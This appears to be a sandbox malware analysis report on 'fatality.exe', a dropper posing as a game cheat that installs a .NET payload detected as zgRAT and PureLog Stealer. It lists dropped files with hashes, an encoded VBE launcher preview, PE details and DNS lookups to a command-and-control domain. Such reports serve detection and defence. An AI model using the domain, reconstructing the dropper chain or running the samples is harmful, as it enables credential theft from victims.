                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):4608
                                                                  Entropy (8bit):3.9511493830697266
                                                                  Encrypted:false
                                                                  SSDEEP:48:6bprPtxM7Jt8Bs3FJsdcV4MKe271d4A2UvqBHOOulajfqXSfbNtm:yPwPc+Vx9MkUvkocjRzNt
                                                                  MD5:ADE6A18F90D238D56E4B938C8A0D5BAB
                                                                  SHA1:F90DA0489CFDF8BCF10B2FB4638AD0C39310B296
                                                                  SHA-256:E7165E9F9DF4E4BA98643FC692FAC7F5B0E50C3FF54B48C1EF4E522CDE414295
                                                                  SHA-512:C6D24BD0BB93CF42471D079ED5E30490EF04D73417D25AF87F6BCCF5D52E418E6284594D1919F69F1CFF897B08D1B6E8BAE2AB43A238DD798301F5628A904A4E
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@.................................L'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..$.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                  C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\fatality.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):89
                                                                  Entropy (8bit):5.014619947625862
                                                                  Encrypted:false
                                                                  SSDEEP:3:xDGTLz6PGKvAKa6YonqQILiM0XESLI3i9A:xDIz6PG0La6zILiMr4IS9A
                                                                  MD5:DE5B4FDE5BC10D0F76A55EB9D249AB56
                                                                  SHA1:751938B6AB03340842B429805FD2DA1AA0D8C964
                                                                  SHA-256:009AA3F866391C87BD840EFB9B6B4EB33FC4DCB625CD23E436D0C9383E033F0F
                                                                  SHA-512:58F02657DB363B742C6AEE66CCD5A6B279280E2DD09D7394B7B9907CA2CD005CD67EE88CA98D533605E30608FC61ABC6F51F7D3BE4A3813D7414D280B6F16A1F
                                                                  Malicious:false
                                                                  Preview:%ENrfyRjMcxlV%%CWcjcFQ%..%VaremYySQf%"C:\blockcomSession/containerReview.exe"%VRGeLHaFaS%

                                                                  C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\fatality.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):236
                                                                  Entropy (8bit):5.863135001723359
                                                                  Encrypted:false
                                                                  SSDEEP:6:G/kgwqK+NkLzWbHa/JUrFnBaORbM5nCeHWfwtqbcl3TjW67:G/kBMCzWLauhBaORbQCmWYtqbclT667
                                                                  MD5:D2DD350044CE1FE408A44A036A7E6A0D
                                                                  SHA1:3597E45DEB69F4AA4749855E9ED452A39A9C7D42
                                                                  SHA-256:487BFE07ABFF347481F10C648717AAB8008C7606C026B920358544F85C25E1B2
                                                                  SHA-512:81147D83DC5FFD1ADB10ADD8486F6DAC65DF0E7C579F8244EF8F3D6F646CED97FAD3F55A178CED9B60F5F23BB77A0E29BCCB22651280A9EAE135976AF71C366A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  Preview:#@~^0wAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z8^W13mK:Un/kkGxJz]f.!w.z:O,04B[Dn4`h3M.}tW\ _2xUn!.A!(TVyt^R(CDJS,!BP0mVknWUMAAA==^#~@.

                                                                  C:\blockcomSession\containerReview.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\fatality.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2006016
                                                                  Entropy (8bit):7.565400810273061
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                  MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                  SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                  SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                  SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.........................\...M........................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~p...{c...9....& ....8....*(.... ....~p...{y...:....& ....8....(.... ....~p...{....9....& ....8y......0.......... ........8........E....1...............V...8,.......~....(E...~....(I... ....?.... ....8.......... ....~p...{m...:....& ....8....~....(=... .... .... ....s....~....(A....... ....~p...{....9Q...& ....8F...r...ps....z*~....:..

                                                                  C:\blockcomSession\d81cfa058c78b8

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:ASCII text, with very long lines (682), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):682
                                                                  Entropy (8bit):5.884418242643272
                                                                  Encrypted:false
                                                                  SSDEEP:12:P8CWavAilZBJ9McPtx+frppwK3DoMThR1OgNaox6WBVn+ziyVsqAM:P8C9jBJ9MwCx3DoMThR1OgrkAZyVaM
                                                                  MD5:F89357C623B432B41B879DB7EDC6CE66
                                                                  SHA1:983F2C8BF1EB0B8A3C459F518EC03BC3B6DE820B
                                                                  SHA-256:A13FD56225F8982E943378D3810FCE8C4150432966635A016430F0D00740C06B
                                                                  SHA-512:BD7D38ECCC025598F9C8227912D483BD011F711360FD52C7BCF10FE8AAEA81B7F3F0A863DFEF7240D65FFD9355C37BC10AC86D72F2904E3DC831A40CFBBF2545
                                                                  Malicious:false
                                                                  Preview:8GIJuOhYhsslTTl7hrJXsBbgMfiYQz9DJVFqgJ5EAJFjjmmQ9IBXSd77pl6OpIHrspc8N5bYvFXj617j3RYHymupXIA4MrY1BY04KoCErmmNGYAyoWVXt92G4xkF5hMEqfhhACZOOUaMAhi8HMPzVBHBgt9XD7JJahgl1dxl7GIZjqGWOm8tRWspXfBQCCLRKRvcA7HoYn1O2scznnIb8a1Ey1NVbhj550OR5oWQfUUoeewpCLnZ3uTuZrnItvM0E6TCdK48R26oFNjUFiSP4JCLhe2NANhtHejiKuL1QoIAyopMITDKc6653Ie9Sr7DUMglnAJVWa9PABX3zpFrJWRLhooCPMjjrEplHEjHJryB7r42vlKmlP385VD8VHGK1Zi6VvvuG7ichPN0uwRoC68bKrqvAkwCloJiJ8g90ZgnrbapINOizcH5bHvoF9ugLg03FprwQRynZUttQAnxWNMJgOGCN240oAcLlhkcgbSioefGXBYEV6J7TqX1ipjYW78Z2iItZLR44nfCsAoLdzes0e14Kt3124MqfFOz3ppKpPCqLUIiAY4gcQjXqOjqRZBAbygmvzRyKUCkbLszkV0eApOPg0IpG83PNCOWyfwLGFWHO85fftF5jhAwkQG5rmsMbwXZ6WBFjpY4TGBh4mJW27qqCcvhY1deXJqblg

                                                                  C:\blockcomSession\f71eea7c943fb4

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:ASCII text, with very long lines (332), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):332
                                                                  Entropy (8bit):5.8335759852953055
                                                                  Encrypted:false
                                                                  SSDEEP:6:ONpApthSfF9yTn4StUV3QXw1APIwRacELTzrx08ZIftzpE8dicISqU8fvI:wpAJoF9yEStUV3ofxRaljZyVdicbv9
                                                                  MD5:6380CB1F24A7D1FD02B9F6987C3EB779
                                                                  SHA1:4A653C30F23D5087CD481F85358DC7D29149C31A
                                                                  SHA-256:FA1DE9ABD89D952CC8CC84074CF593AA1FF340A852BE8C3314D2B495D9257095
                                                                  SHA-512:2ABAB82B49BA10FEA484D54BF374E680C33CB49A5AEB8351AC84DB80605FA13CEEFFDA27D2F5AFD331A94BDD7BAF74B736E1D7FF6BD1030E8CAF33DA39921C06
                                                                  Malicious:false
                                                                  Preview:QqGxVf4GiMycKu1P2Ut6QrWWpWN770pu3znAABNdhKLsdqJgt6nxhMDiUuI8R7IsgDjVH0P1HQZGgo28NrNAN1MrvEqQ2OLjCcLZHxZ2rvqRw7Cp1JuktHeo01jCK982EzDDcc0ZRUTbL55yCAYsdl048gjQNXssxyN638NYTVTYyDd56vAJkPYd9JF53kL4mkoWs85Dx9ZISbF4DnUcXiIhZu7t3ResJYwOZGN706Wl0PLiDK2QQthDcG77BLKger93o1f6aWmaMgrJiYqsYOcZ1svSJP6owzGJPS3Mo603GG15YxZmfbHPOkB6FNwKZ7oWai3QedDc

                                                                  C:\blockcomSession\mQBLhXIPAJ.exe

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2006016
                                                                  Entropy (8bit):7.565400810273061
                                                                  Encrypted:false
                                                                  SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                  MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                  SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                  SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                  SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.........................\...M........................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~p...{c...9....& ....8....*(.... ....~p...{y...:....& ....8....(.... ....~p...{....9....& ....8y......0.......... ........8........E....1...............V...8,.......~....(E...~....(I... ....?.... ....8.......... ....~p...{m...:....& ....8....~....(=... .... .... ....s....~....(A....... ....~p...{....9Q...& ....8F...r...ps....z*~....:..

                                                                  \Device\Null

                                                                  Download File
                                                                  Process:C:\Windows\System32\w32tm.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):151
                                                                  Entropy (8bit):4.878512534301145
                                                                  Encrypted:false
                                                                  SSDEEP:3:VLV993J+miJWEoJ8FXAQvdXvUQdAXaNvpGTNvj:Vx993DEUpaUX
                                                                  MD5:2F989F7A3443C4A62D25BBA86BA1C41E
                                                                  SHA1:41C12A7F341CF9580BD0C524A06B0D8C8E60C542
                                                                  SHA-256:863DEBEB31D47C00BE3921205694F171ECC4F5A21B90103F574819F5659CD287
                                                                  SHA-512:ACA7992031333316AFB02CCDD1E33E23EBB74F3270B2FE69D6D4F377B75E23DB9FB6881DDDC20616F74390B945F5E5BEFA19F19074FC5A45879701EB97780E3B
                                                                  Malicious:false
                                                                  Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 13/01/2025 08:15:59..08:15:59, error: 0x80072746.08:16:04, error: 0x80072746.

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.783232715391711
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:fatality.exe
                                                                  File size:3'319'076 bytes
                                                                  MD5:a7040b85fc683f088f4c6e5b44052c43
                                                                  SHA1:7e3d644d1a1fb7b9bcccb6406d2e7fbd062eae66
                                                                  SHA256:b786f31f1c89c71d0510bbd32510595d9891c67db516f968261b02594a423a8d
                                                                  SHA512:e225f6f7e114690aad25e9c67460e50f5b84cc8ca87a69ba94ff63ab42415df176a3ed6c3456cddb849927604a4888b17e5e781ac97d2ba0197f9687bbb2c301
                                                                  SSDEEP:98304:hb5Nf/dq7yqKM1TcGZ6gtq1/Lko4uVa8Nb:FMyqKM1TogtqT44NNb
                                                                  TLSH:4AE5E11A56E25E77C3A4173244A3403E52A2D7363D71FB0A391F11E66803BB5DEB22B7
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                  File Icon

                                                                  Icon Hash:b2f0cc697970b124

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x418d16
                                                                  Entrypoint Section:
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:1
                                                                  File Version Major:5
                                                                  File Version Minor:1
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:1
                                                                  Import Hash:d89f3dcdac0c8dba11dc1162435bedbb

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  call 00007F0B64B7E4F6h
                                                                  jmp 00007F0B64B7E30Eh
                                                                  push 0044BB60h
                                                                  push dword ptr fs:[00000000h]
                                                                  mov eax, dword ptr [esp+10h]
                                                                  mov dword ptr [esp+10h], ebp
                                                                  lea ebp, dword ptr [esp+10h]
                                                                  sub esp, eax
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  mov eax, dword ptr [00466ECCh]
                                                                  xor dword ptr [ebp-04h], eax
                                                                  xor eax, ebp
                                                                  push eax
                                                                  mov dword ptr [ebp-18h], esp
                                                                  push dword ptr [ebp-08h]
                                                                  mov eax, dword ptr [ebp-04h]
                                                                  mov dword ptr [ebp-04h], FFFFFFFEh
                                                                  mov dword ptr [ebp-08h], eax
                                                                  lea eax, dword ptr [ebp-10h]
                                                                  mov dword ptr fs:[00000000h], eax
                                                                  ret
                                                                  mov ecx, dword ptr [ebp-10h]
                                                                  mov dword ptr fs:[00000000h], ecx
                                                                  pop ecx
                                                                  pop edi
                                                                  pop edi
                                                                  pop esi
                                                                  pop ebx
                                                                  mov esp, ebp
                                                                  pop ebp
                                                                  push ecx
                                                                  ret
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  add esp, 04h
                                                                  jmp 00007F0B64F43C69h
                                                                  jmp dword ptr [edx+72h]
                                                                  les eax, fword ptr [ecx-3507549Ah]
                                                                  out dx, eax
                                                                  mov byte ptr [ecx+2Dh], ch
                                                                  loope 00007F0B64B7E50Fh
                                                                  rcl dword ptr [esi], 1
                                                                  push eax
                                                                  test dword ptr [ecx-0Bh], BA12D799h
                                                                  add byte ptr [ecx], cl
                                                                  std
                                                                  jecxz 00007F0B64B7E450h
                                                                  sbb dword ptr [eax+17EA9179h], edx
                                                                  sub bh, dh
                                                                  cwde
                                                                  cmp eax, 87B8702Dh
                                                                  sub byte ptr [edi+eax-5B647B2Ch], ch
                                                                  sal ecx, 1
                                                                  xlatb
                                                                  pop ebx
                                                                  ror esi, cl
                                                                  push cs
                                                                  inc edx
                                                                  stc
                                                                  cdq
                                                                  in al, DFh
                                                                  inc ebp
                                                                  push FFFFFFFEh
                                                                  xor byte ptr [edi], dh
                                                                  sbb dl, byte ptr [edx-66AE482Ch]
                                                                  cmc
                                                                  add dh, byte ptr [esi]
                                                                  shl byte ptr [141748B7h], FFFFFFBDh
                                                                  mov sp, 47E0h

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x2fa0200x34cheat
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2fa0540x210cheat
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x720000x80a8.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2fa0000xccheat
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  0x10000x320000x1be009104f0fc531fdf9fb96d123dff1a3498False0.997276135089686data7.996600566459323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  0x330000xb0000x48009fe47bef5d465074276288c8d112b546False0.9945203993055556data7.979119292488003IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  0x3e0000x250000x800eea4f8d774a89c545bc83f48802e8435False0.91259765625data7.461008587981874IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  0x630000x10000x200a20984dd380aa28b3e8ab1be07362b77False0.447265625data3.7456848543919192IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  0x640000xb0000x2600aafc380576beb683e5abda82733f92a5False0.9828330592105263data7.941503255275258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  0x6f0000x30000x2000c8693ac1d184eed23769063f48116844False0.95849609375PGP Secret Sub-key -7.853249739854464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x720000x90000x8200677d04097b2c351f09c78ba10bd35085False0.854296875data7.51495699813517IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  0x7b0000x27f0000x2ba00f226c5562cd864a0b52094a3f8dcf332unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  cheat0x2fa0000xe70000xe7000c387e7f409bd96385ca608c515b0e8efFalse0.9969160071699135data7.982180837051556IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  PNG0x645240xb45OpenPGP Public KeyEnglishUnited States1.0038128249566725
                                                                  PNG0x6506c0x15a9dataEnglishUnited States0.970492396813903
                                                                  RT_ICON0x725240x63a4PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.0004704406460718
                                                                  RT_DIALOG0x6c9bc0x286emptyEnglishUnited States0
                                                                  RT_DIALOG0x6cc440x13aemptyEnglishUnited States0
                                                                  RT_DIALOG0x6cd800xecemptyEnglishUnited States0
                                                                  RT_DIALOG0x6ce6c0x12eemptyEnglishUnited States0
                                                                  RT_DIALOG0x6cf9c0x338emptyEnglishUnited States0
                                                                  RT_DIALOG0x6d2d40x252emptyEnglishUnited States0
                                                                  RT_STRING0x788c80x1e2dataEnglishUnited States0.3900414937759336
                                                                  RT_STRING0x78aac0x1ccdataEnglishUnited States0.4282608695652174
                                                                  RT_STRING0x78c780x1b8dataEnglishUnited States0.45681818181818185
                                                                  RT_STRING0x78e300x146dataEnglishUnited States0.5153374233128835
                                                                  RT_STRING0x78f780x46cdataEnglishUnited States0.3454063604240283
                                                                  RT_STRING0x793e40x166dataEnglishUnited States0.49162011173184356
                                                                  RT_STRING0x7954c0x152dataEnglishUnited States0.5059171597633136
                                                                  RT_STRING0x796a00x10adataEnglishUnited States0.49624060150375937
                                                                  RT_STRING0x797ac0xbcdataEnglishUnited States0.6329787234042553
                                                                  RT_STRING0x798680xd6dataEnglishUnited States0.5747663551401869
                                                                  RT_GROUP_ICON0x799400x14data1.05
                                                                  RT_MANIFEST0x799540x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                  Imports

                                                                  DLLImport
                                                                  kernel32.dllGetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                                                                  user32.dllMessageBoxA
                                                                  advapi32.dllRegCloseKey
                                                                  oleaut32.dllSysFreeString
                                                                  gdi32.dllCreateFontA
                                                                  shell32.dllShellExecuteA
                                                                  version.dllGetFileVersionInfoA
                                                                  gdiplus.dllGdipAlloc

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 13, 2025 12:48:32.196950912 CET5633853192.168.2.5162.159.36.2
                                                                  Jan 13, 2025 12:48:32.202265024 CET5356338162.159.36.2192.168.2.5
                                                                  Jan 13, 2025 12:48:32.202341080 CET5633853192.168.2.5162.159.36.2
                                                                  Jan 13, 2025 12:48:32.207901001 CET5356338162.159.36.2192.168.2.5
                                                                  Jan 13, 2025 12:48:32.719033003 CET5633853192.168.2.5162.159.36.2
                                                                  Jan 13, 2025 12:48:32.723850012 CET5633853192.168.2.5162.159.36.2
                                                                  Jan 13, 2025 12:48:32.729027987 CET5356338162.159.36.2192.168.2.5
                                                                  Jan 13, 2025 12:48:32.729090929 CET5633853192.168.2.5162.159.36.2

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 13, 2025 12:48:23.805847883 CET5382453192.168.2.51.1.1.1
                                                                  Jan 13, 2025 12:48:24.120889902 CET53538241.1.1.1192.168.2.5
                                                                  Jan 13, 2025 12:48:32.196382046 CET5363607162.159.36.2192.168.2.5
                                                                  Jan 13, 2025 12:48:32.747226954 CET5871953192.168.2.51.1.1.1
                                                                  Jan 13, 2025 12:48:32.754957914 CET53587191.1.1.1192.168.2.5
                                                                  Jan 13, 2025 12:48:46.320416927 CET5312053192.168.2.51.1.1.1
                                                                  Jan 13, 2025 12:48:46.768088102 CET53531201.1.1.1192.168.2.5
                                                                  Jan 13, 2025 12:48:53.667042971 CET6040553192.168.2.51.1.1.1
                                                                  Jan 13, 2025 12:48:53.981053114 CET53604051.1.1.1192.168.2.5
                                                                  Jan 13, 2025 12:49:11.259903908 CET5704653192.168.2.51.1.1.1
                                                                  Jan 13, 2025 12:49:11.735621929 CET53570461.1.1.1192.168.2.5
                                                                  Jan 13, 2025 12:49:19.297024965 CET5623453192.168.2.51.1.1.1
                                                                  Jan 13, 2025 12:49:19.453996897 CET53562341.1.1.1192.168.2.5
                                                                  Jan 13, 2025 12:49:27.416022062 CET6202253192.168.2.51.1.1.1
                                                                  Jan 13, 2025 12:49:27.429466963 CET53620221.1.1.1192.168.2.5
                                                                  Jan 13, 2025 12:49:51.112107992 CET5939153192.168.2.51.1.1.1
                                                                  Jan 13, 2025 12:49:51.131388903 CET53593911.1.1.1192.168.2.5
                                                                  Jan 13, 2025 12:49:59.438361883 CET5299853192.168.2.51.1.1.1
                                                                  Jan 13, 2025 12:49:59.674460888 CET53529981.1.1.1192.168.2.5
                                                                  Jan 13, 2025 12:50:06.353496075 CET5769253192.168.2.51.1.1.1
                                                                  Jan 13, 2025 12:50:06.503123999 CET53576921.1.1.1192.168.2.5

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Jan 13, 2025 12:48:23.805847883 CET192.168.2.51.1.1.10x72b1Standard query (0)373292cm.nyashka.topA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 12:48:32.747226954 CET192.168.2.51.1.1.10xa786Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                  Jan 13, 2025 12:48:46.320416927 CET192.168.2.51.1.1.10xca2aStandard query (0)373292cm.nyashka.topA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 12:48:53.667042971 CET192.168.2.51.1.1.10x38d5Standard query (0)373292cm.nyashka.topA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 12:49:11.259903908 CET192.168.2.51.1.1.10xaf4eStandard query (0)373292cm.nyashka.topA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 12:49:19.297024965 CET192.168.2.51.1.1.10x1670Standard query (0)373292cm.nyashka.topA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 12:49:27.416022062 CET192.168.2.51.1.1.10xc892Standard query (0)373292cm.nyashka.topA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 12:49:51.112107992 CET192.168.2.51.1.1.10x34dcStandard query (0)373292cm.nyashka.topA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 12:49:59.438361883 CET192.168.2.51.1.1.10x74a0Standard query (0)373292cm.nyashka.topA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 12:50:06.353496075 CET192.168.2.51.1.1.10x238aStandard query (0)373292cm.nyashka.topA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jan 13, 2025 12:48:24.120889902 CET1.1.1.1192.168.2.50x72b1Server failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 12:48:32.754957914 CET1.1.1.1192.168.2.50xa786Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                  Jan 13, 2025 12:48:46.768088102 CET1.1.1.1192.168.2.50xca2aServer failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 13, 2025 12:48:53.981053114 CET1.1.1.1192.168.2.50x38d5Server failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false
